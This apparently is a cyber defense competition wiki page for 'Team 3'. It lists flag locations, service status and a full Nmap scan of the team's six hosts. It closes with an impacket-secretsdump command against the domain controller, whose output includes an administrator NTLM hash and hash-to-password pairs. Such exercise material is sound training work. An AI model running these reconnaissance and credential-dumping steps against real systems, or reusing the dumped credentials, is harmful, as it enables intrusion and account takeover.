Team 3 Wiki Page

Signup Login
Team Information
Team The Notorious Scoundrels logo
Number
Team 3
Name
The Notorious Scoundrels
IP Range
201.203.200.0/24
Domain
team3.isucdc.com
Current Place
5th
Red Teamer(s)
None
Flag Status
Blue Flags
AD C:\Windows\System32\ JD C:\Windows\System32\ LTV /etc/ NEWS /etc/ WSTN /etc/ WWW /etc/ TX Arduino LoRa x-api-key-flag
Red Flags
AD C:\Users\Administrator\ JD C:\Users\Administrator\ LTV /root/ NEWS /root/ WSTN /root WWW /root
Service Status
AD LDAP
AD RDP
JD RDP
LTV SSH
NEWS SSH
NEWS HTTP
WSTN SSH
WSTN MQTT
WWW SSH
WWW HTTP
Nmap
# Nmap 7.93 scan initiated Sat Oct  4 09:56:37 2025 as: "C:\\Program Files (x86)\\Nmap\\nmap.exe" -A -sV -p- -iL "C:\\Users\\Benjamin Merz\\Documents\\ISUCDC_hostname_list3.txt" -o "C:\\Users\\Benjamin Merz\\Documents\\Team2"
Nmap scan report for ad.team3.isucdc.com (201.203.200.10)
Host is up (0.015s latency).
Not shown: 65507 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-04 15:00:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: team3.isucdc.com0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:ad.team3.isucdc.com
| Not valid before: 2025-10-01T00:52:29
|_Not valid after:  2025-10-08T00:58:48
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: TEAM3
|   NetBIOS_Domain_Name: TEAM3
|   NetBIOS_Computer_Name: AD
|   DNS_Domain_Name: team3.isucdc.com
|   DNS_Computer_Name: ad.team3.isucdc.com
|   DNS_Tree_Name: team3.isucdc.com
|   Product_Version: 10.0.17763
|_  System_Time: 2025-10-04T15:02:48+00:00
| ssl-cert: Subject: commonName=ad.team3.isucdc.com
| Not valid before: 2025-09-05T01:19:40
|_Not valid after:  2026-03-07T01:19:40
|_ssl-date: 2025-10-04T15:03:30+00:00; -1s from scanner time.
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
59258/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: AD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-04T15:02:49
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

TRACEROUTE (using port 135/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 201.203.200.30
2   1.00 ms 201.203.200.10

Nmap scan report for jd.team3.isucdc.com (201.203.200.20)
Host is up (0.018s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: TEAM3
|   NetBIOS_Domain_Name: TEAM3
|   NetBIOS_Computer_Name: JD
|   DNS_Domain_Name: team3.isucdc.com
|   DNS_Computer_Name: jd.team3.isucdc.com
|   DNS_Tree_Name: team3.isucdc.com
|   Product_Version: 10.0.22621
|_  System_Time: 2025-10-04T15:02:49+00:00
| ssl-cert: Subject: commonName=jd.team3.isucdc.com
| Not valid before: 2025-09-07T16:21:44
|_Not valid after:  2026-03-09T16:21:44
|_ssl-date: TLS randomness does not represent time
5040/tcp  open  unknown
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
49673/tcp open  msrpc              Microsoft Windows RPC
49674/tcp open  msrpc              Microsoft Windows RPC
49714/tcp open  msrpc              Microsoft Windows RPC
49719/tcp open  msrpc              Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10 (90%)
OS CPE: cpe:/o:microsoft:windows_10:1703
Aggressive OS guesses: Microsoft Windows 10 1703 (90%), Microsoft Windows 10 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-04T15:02:56
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -2s

TRACEROUTE (using port 135/tcp)
HOP RTT     ADDRESS
-   Hop 1 is the same as for 201.203.200.30
2   1.00 ms 201.203.200.20

Nmap scan report for ltv.team3.isucdc.com (201.203.200.30)
Host is up (0.016s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 0c7c02eb5a9fe29566c11e06cf84cf47 (DSA)
|   2048 453739b58fc6b978ab1e41dd81596ecf (RSA)
|   256 89e9f14ac8d9391f078dd4603c19c4dd (ECDSA)
|_  256 58de7185954051643b9ee99cebfdf838 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (91%), Linksys EA3500 WAP (91%), Linux 3.13 (89%), Linux 3.16 (89%), Linux 3.16 - 4.6 (88%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%), Android 5.0 - 6.0.1 (Linux 3.4) (87%), Linux 2.6.32 (87%), Linux 2.6.32 - 3.10 (86%), Linux 3.10 - 4.11 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
1   1.00 ms 12.110.254.254
2   1.00 ms 201.203.200.30

Nmap scan report for news.team3.isucdc.com (201.203.200.40)
Host is up (0.022s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 357994a98dd506f35bb6c7317962de08 (RSA)
|   256 95a6a90f800410e48ba00b686b3907e8 (ECDSA)
|_  256 9578e1eedc0ef62ba30dddaae08fa7cd (ED25519)
80/tcp   open   http       Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp  closed https
8080/tcp open   http-proxy
|_http-title: Site doesn't have a title (application/json).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Disposition: inline;filename=f.txt
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:39 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:38.952+00:00","status":404,"error":"Not Found","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:38 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:38.841+00:00","status":404,"error":"Not Found","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 04 Oct 2025 15:01:38 GMT
|     Connection: close
|     {"timestamp":"2025-10-04T15:01:38.876+00:00","status":404,"error":"Not Found","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 04 Oct 2025 15:01:38 GMT
|     Connection: close
|     HTTP Status 400 </div><div>|     Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}

HTTP Status 400 

|     Request
|   Socks5: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sat, 04 Oct 2025 15:01:39 GMT
|     Connection: close
|     HTTP Status 400 </div><div>|     Requestbody {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}

HTTP Status 400 

|_    Request
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.93%I=7%D=10/4%Time=68E136D4%P=i686-pc-windows-windows%
SF:r(GetRequest,11B,"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20A
SF:ccess-Control-Request-Method\r\nVary:\x20Access-Control-Request-Headers
SF:\r\nContent-Type:\x20application/json\r\nDate:\x20Sat,\x2004\x20Oct\x20
SF:2025\x2015:01:38\x20GMT\r\nConnection:\x20close\r\n\r\n{\"timestamp\":\
SF:"2025-10-04T15:01:38\.841\+00:00\",\"status\":404,\"error\":\"Not\x20Fo
SF:und\",\"path\":\"/\"}")%r(HTTPOptions,11B,"HTTP/1\.1\x20404\x20\r\nVary
SF::\x20Origin\r\nVary:\x20Access-Control-Request-Method\r\nVary:\x20Acces
SF:s-Control-Request-Headers\r\nContent-Type:\x20application/json\r\nDate:
SF:\x20Sat,\x2004\x20Oct\x202025\x2015:01:38\x20GMT\r\nConnection:\x20clos
SF:e\r\n\r\n{\"timestamp\":\"2025-10-04T15:01:38\.876\+00:00\",\"status\":
SF:404,\"error\":\"Not\x20Found\",\"path\":\"/\"}")%r(RTSPRequest,24E,"HTT
SF:P/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nConten
SF:t-Language:\x20en\r\nContent-Length:\x20435\r\nDate:\x20Sat,\x2004\x20O
SF:ct\x202025\x2015:01:38\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:x20html>HTTP\x20Status\x20400\x20\xe2</div><div>SF:\x80\x93\x20Bad\x20Requestbody\x20{
SF:font-family:Tahoma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{col
SF:or:white;background-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x2
SF:0{font-size:16px;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}
SF:\x20a\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525D
SF:76;border:none;}

HTTP\x20Status\x20400\x20\xe2\

SF:x80\x93\x20Bad\x20Request")%r(FourOhFourRequest,16A,
SF:"HTTP/1\.1\x20404\x20\r\nVary:\x20Origin\r\nVary:\x20Access-Control-Req
SF:uest-Method\r\nVary:\x20Access-Control-Request-Headers\r\nContent-Dispo
SF:sition:\x20inline;filename=f\.txt\r\nContent-Type:\x20application/json\
SF:r\nDate:\x20Sat,\x2004\x20Oct\x202025\x2015:01:39\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n{\"timestamp\":\"2025-10-04T15:01:38\.952\+00:00\",\"s
SF:tatus\":404,\"error\":\"Not\x20Found\",\"path\":\"/nice%20ports%2C/Tri%
SF:6Eity\.txt%2ebak\"}")%r(Socks5,24E,"HTTP/1\.1\x20400\x20\r\nContent-Typ
SF:e:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Len
SF:gth:\x20435\r\nDate:\x20Sat,\x2004\x20Oct\x202025\x2015:01:39\x20GMT\r\
SF:nConnection:\x20close\r\n\r\n
SF:ad>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</titl</div><div>SF:e><style\x20type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-se</div><div>SF:rif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D7</div><div>SF:6;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{fon</div><div>SF:t-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.lin</div><div>SF:e\x20{height:1px;background-color:#525D76;border:none;}</style></head><</div><div>SF:body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></</div><div>SF:body></html>");</div><div>Device type: general purpose|proxy server|storage-misc</div><div>Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (92%), WebSense embedded (86%), Synology DiskStation Manager 5.X (85%), Netgear RAIDiator 4.X (85%)</div><div>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28</div><div>Aggressive OS guesses: Linux 4.15 - 5.6 (92%), Linux 5.0 - 5.3 (91%), Linux 5.0 - 5.4 (88%), Linux 5.4 (88%), Linux 2.6.32 (88%), Linux 3.2 - 4.9 (88%), Linux 2.6.32 - 3.10 (87%), Linux 5.3 - 5.4 (87%), Linux 3.4 - 3.10 (86%), Websense Content Gateway (86%)</div><div>No exact OS matches for host (test conditions non-ideal).</div><div>Network Distance: 2 hops</div><div>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</div><div><br></div><div>TRACEROUTE (using port 443/tcp)</div><div>HOP RTT     ADDRESS</div><div>-   Hop 1 is the same as for 201.203.200.30</div><div>2   1.00 ms 201.203.200.40</div><div><br></div><div>Nmap scan report for wstn.team3.isucdc.com (201.203.200.50)</div><div>Host is up (0.0011s latency).</div><div>Not shown: 65533 filtered tcp ports (no-response)</div><div>PORT     STATE SERVICE                  VERSION</div><div>22/tcp   open  ssh                      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)</div><div>| ssh-hostkey: </div><div>|   3072 5a185df5ed7864cc5387404bb610863a (RSA)</div><div>|   256 e474126041a3534067eeeadac542e3fd (ECDSA)</div><div>|_  256 0799db383afe5abafc5c27c9ea83c3c5 (ED25519)</div><div>1883/tcp open  mosquitto version 2.0.11</div><div>| mqtt-subscribe: </div><div>|   Topics and their most recent payloads: </div><div>|     $SYS/broker/load/sockets/1min: 1.76</div><div>|     $SYS/broker/heap/maximum: 43896</div><div>|     $SYS/broker/publish/messages/sent: 61</div><div>|     $SYS/broker/bytes/sent: 2502</div><div>|     $SYS/broker/heap/current: 43392</div><div>|     $SYS/broker/messages/sent: 63</div><div>|     $SYS/broker/clients/connected: 1</div><div>|     $SYS/broker/load/sockets/5min: 0.61</div><div>|     $SYS/broker/store/messages/bytes: 151</div><div>|     $SYS/broker/load/bytes/sent/5min: 238.35</div><div>|     $SYS/broker/clients/maximum: 1</div><div>|     $SYS/broker/load/messages/received/15min: 0.20</div><div>|     $SYS/broker/uptime: 9504 seconds</div><div>|     $SYS/broker/load/bytes/received/15min: 4.54</div><div>|     $SYS/broker/clients/total: 1</div><div>|     $SYS/broker/load/messages/received/5min: 0.58</div><div>|     $SYS/broker/load/bytes/sent/15min: 80.43</div><div>|     $SYS/broker/messages/stored: 33</div><div>|     $SYS/broker/load/connections/5min: 0.38</div><div>|     $SYS/broker/store/messages/count: 33</div><div>|     $SYS/broker/load/connections/15min: 0.13</div><div>|     $SYS/broker/clients/active: 1</div><div>|     $SYS/broker/load/publish/sent/1min: 28.32</div><div>|     $SYS/broker/subscriptions/count: 2</div><div>|     $SYS/broker/load/sockets/15min: 0.34</div><div>|     $SYS/broker/version: mosquitto version 2.0.11</div><div>|     $SYS/broker/retained messages/count: 36</div><div>|     $SYS/broker/publish/bytes/sent: 263</div><div>|     $SYS/broker/load/messages/received/1min: 2.46</div><div>|     $SYS/broker/load/bytes/received/1min: 58.00</div><div>|     $SYS/broker/messages/received: 3</div><div>|     $SYS/broker/load/publish/sent/5min: 6.09</div><div>|     $SYS/broker/load/messages/sent/1min: 30.78</div><div>|     $SYS/broker/load/publish/sent/15min: 2.05</div><div>|     $SYS/broker/load/messages/sent/5min: 6.66</div><div>|     $SYS/broker/load/bytes/sent/1min: 1108.09</div><div>|     $SYS/broker/load/connections/1min: 1.55</div><div>|     $SYS/broker/load/bytes/received/5min: 13.30</div><div>|     $SYS/broker/bytes/received: 69</div><div>|_    $SYS/broker/load/messages/sent/15min: 2.25</div><div>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</div><div>Device type: general purpose</div><div>Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (91%)</div><div>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3</div><div>Aggressive OS guesses: Linux 4.15 - 5.6 (91%), Linux 5.0 - 5.3 (90%), Linux 5.0 - 5.4 (87%), Linux 5.4 (87%), Linux 2.6.32 (87%), Linux 3.2 - 4.9 (87%), Linux 2.6.32 - 3.10 (86%), Linux 5.3 - 5.4 (86%)</div><div>No exact OS matches for host (test conditions non-ideal).</div><div>Network Distance: 2 hops</div><div>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</div><div><br></div><div>TRACEROUTE (using port 22/tcp)</div><div>HOP RTT     ADDRESS</div><div>-   Hop 1 is the same as for 201.203.200.30</div><div>2   1.00 ms 201.203.200.50</div><div><br></div><div>Nmap scan report for <a target="_blank" rel="nofollow" href="http://www.team3.isucdc.com">www.team3.isucdc.com</a> (201.203.200.60)</div><div>Host is up (0.0011s latency).</div><div>Not shown: 65531 filtered tcp ports (no-response)</div><div>PORT     STATE  SERVICE VERSION</div><div>22/tcp   open   ssh     OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)</div><div>| ssh-hostkey: </div><div>|   256 a06a89c7a4b137232d3aa124c3761006 (ECDSA)</div><div>|_  256 a87c353ddf2b92072b1ec85a8dd37e0f (ED25519)</div><div>80/tcp   open   http    Apache httpd 2.4.65 ((Debian))</div><div>|_http-server-header: Apache/2.4.65 (Debian)</div><div>|_http-title: Arrow pointing to the left</div><div>443/tcp  closed https</div><div>3000/tcp open   ppp?</div><div>| fingerprint-strings: </div><div>|   GetRequest, HTTPOptions: </div><div>|     HTTP/1.1 200 OK</div><div>|     content-type: text/html;charset=utf-8</div><div>|     x-powered-by: Nuxt</div><div>|     Date: Sat, 04 Oct 2025 15:06:15 GMT</div><div>|     Connection: close</div><div>|     <!DOCTYPE html><html><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><style id="nuxt-ui-colors">@layer base {</div><div>|     :root {</div><div>|     --ui-color-primary-50: var(--color-green-50, oklch(98.2% 0.018 155.826));</div><div>|     --ui-color-primary-100: var(--color-green-100, oklch(96.2% 0.044 156.743));</div><div>|     --ui-color-primary-200: var(--color-green-200, oklch(92.5% 0.084 155.995));</div><div>|     --ui-color-primary-300: var(--color-green-300, oklch(87.1% 0.15 154.449));</div><div>|     --ui-color-primary-400: var(--color-green-400, oklch(79.2% 0.209 151.711));</div><div>|     --ui-color-primary-500: var(--color-green-500, oklch(72.3% 0.219 149.579));</div><div>|     --ui-color-primary-600: var(--color-green-600, oklch(62.7% 0.194 149.214));</div><div>|     --ui-color-primary-700: var(--color-green-700, oklch(</div><div>|   Help, NCP: </div><div>|     HTTP/1.1 400 Bad Request</div><div>|_    Connection: close</div><div>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <a target="_blank" rel="nofollow" href="https://nmap.org/cgi-bin/submit.cgi?new-service">https://nmap.org/cgi-bin/submit.cgi?new-service</a> :</div><div>SF-Port3000-TCP:V=7.93%I=7%D=10/4%Time=68E137E8%P=i686-pc-windows-windows%</div><div>SF:r(GetRequest,1C84,"HTTP/1\.1\x20200\x20OK\r\ncontent-type:\x20text/html</div><div>SF:;charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20Sat,\x2004\x20Oct\x</div><div>SF:202025\x2015:06:15\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20h</div><div>SF:tml><html><head><meta\x20charset=\"utf-8\"><meta\x20name=\"viewport\"\x</div><div>SF:20content=\"width=device-width,\x20initial-scale=1\"><style\x20id=\"nux</div><div>SF:t-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{\n\x20\x20--ui-col</div><div>SF:or-primary-50:\x20var\(--color-green-50,\x20oklch\(98\.2%\x200\.018\x20</div><div>SF:155\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var\(--color-green-10</div><div>SF:0,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\x20--ui-color-prim</div><div>SF:ary-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\x200\.084\x20155\.</div><div>SF:995\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--color-green-300,\x2</div><div>SF:0oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--ui-color-primary-40</div><div>SF:0:\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.209\x20151\.711\)\</div><div>SF:);\n\x20\x20--ui-color-primary-500:\x20var\(--color-green-500,\x20oklch</div><div>SF:\(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-color-primary-600:\x2</div><div>SF:0var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x20149\.214\)\);\n\</div><div>SF:x20\x20--ui-color-primary-700:\x20var\(--color-green-700,\x20oklch\(")%</div><div>SF:r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r</div><div>SF:\n\r\n")%r(NCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x2</div><div>SF:0close\r\n\r\n")%r(HTTPOptions,1C84,"HTTP/1\.1\x20200\x20OK\r\ncontent-</div><div>SF:type:\x20text/html;charset=utf-8\r\nx-powered-by:\x20Nuxt\r\nDate:\x20S</div><div>SF:at,\x2004\x20Oct\x202025\x2015:06:15\x20GMT\r\nConnection:\x20close\r\n</div><div>SF:\r\n<!DOCTYPE\x20html><html><head><meta\x20charset=\"utf-8\"><meta\x20n</div><div>SF:ame=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\"></div><div>SF:<style\x20id=\"nuxt-ui-colors\">@layer\x20base\x20{\n\x20\x20:root\x20{</div><div>SF:\n\x20\x20--ui-color-primary-50:\x20var\(--color-green-50,\x20oklch\(98</div><div>SF:\.2%\x200\.018\x20155\.826\)\);\n\x20\x20--ui-color-primary-100:\x20var</div><div>SF:\(--color-green-100,\x20oklch\(96\.2%\x200\.044\x20156\.743\)\);\n\x20\</div><div>SF:x20--ui-color-primary-200:\x20var\(--color-green-200,\x20oklch\(92\.5%\</div><div>SF:x200\.084\x20155\.995\)\);\n\x20\x20--ui-color-primary-300:\x20var\(--c</div><div>SF:olor-green-300,\x20oklch\(87\.1%\x200\.15\x20154\.449\)\);\n\x20\x20--u</div><div>SF:i-color-primary-400:\x20var\(--color-green-400,\x20oklch\(79\.2%\x200\.</div><div>SF:209\x20151\.711\)\);\n\x20\x20--ui-color-primary-500:\x20var\(--color-g</div><div>SF:reen-500,\x20oklch\(72\.3%\x200\.219\x20149\.579\)\);\n\x20\x20--ui-col</div><div>SF:or-primary-600:\x20var\(--color-green-600,\x20oklch\(62\.7%\x200\.194\x</div><div>SF:20149\.214\)\);\n\x20\x20--ui-color-primary-700:\x20var\(--color-green-</div><div>SF:700,\x20oklch\(");</div><div>Device type: general purpose|proxy server|storage-misc</div><div>Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (92%), WebSense embedded (85%), Synology DiskStation Manager 5.X (85%), Netgear RAIDiator 4.X (85%)</div><div>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28</div><div>Aggressive OS guesses: Linux 4.15 - 5.6 (92%), Linux 5.0 - 5.3 (90%), Linux 2.6.32 (88%), Linux 3.2 - 4.9 (88%), Linux 5.0 - 5.4 (87%), Linux 2.6.32 - 3.10 (87%), Linux 5.3 - 5.4 (87%), Linux 5.4 (87%), Linux 3.4 - 3.10 (86%), Websense Content Gateway (85%)</div><div>No exact OS matches for host (test conditions non-ideal).</div><div>Network Distance: 2 hops</div><div>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</div><div><br></div><div>TRACEROUTE (using port 443/tcp)</div><div>HOP RTT     ADDRESS</div><div>-   Hop 1 is the same as for 201.203.200.30</div><div>2   1.00 ms 201.203.200.60</div><div><br></div><div>OS and Service detection performed. Please report any incorrect results at <a target="_blank" rel="nofollow" href="https://nmap.org/submit/">https://nmap.org/submit/</a> .</div><div># Nmap done at Sat Oct  4 10:06:45 2025 -- 6 IP addresses (6 hosts up) scanned in 607.84 seconds</div><div><br></div>
Notable Vulnerabilities
impacket-secretsdump 'AD$'@ad.team3.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

4f4fcd1696d00353d227adb600cb31f0->dax109feb
8d71d1474c84efde1360d9d912563a1b->box746kuk
8cc94bfff77c598188d5f0b96fdb8832->zel164nac
2f38daebf6a54ef98b61939d62a930d0->meb887dop
654f046355f27fbe651e4587ad61427a->cis080yog
af59cd6f4a6116d17bb4d4e11df81a4d->zuk347piw
808ac06bfd578e4224389999a7d78ba5->nek977don
b16da5dfa1d4728206d11df97b151942->lal430qob
e1876e00d9ccec5acc822b5bb04e01e9->paw032gef
9cf5138794a7c041f1ecadb054b9d545->gin711zeh
d38941df528576ca534003d034615aca->tic792viv


Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Scoundrel\Scoundrel:500:aad3b435b51404eeaad3b435b51404ee:6fcb5912c314eaaa1377f2eacf7f3278:::
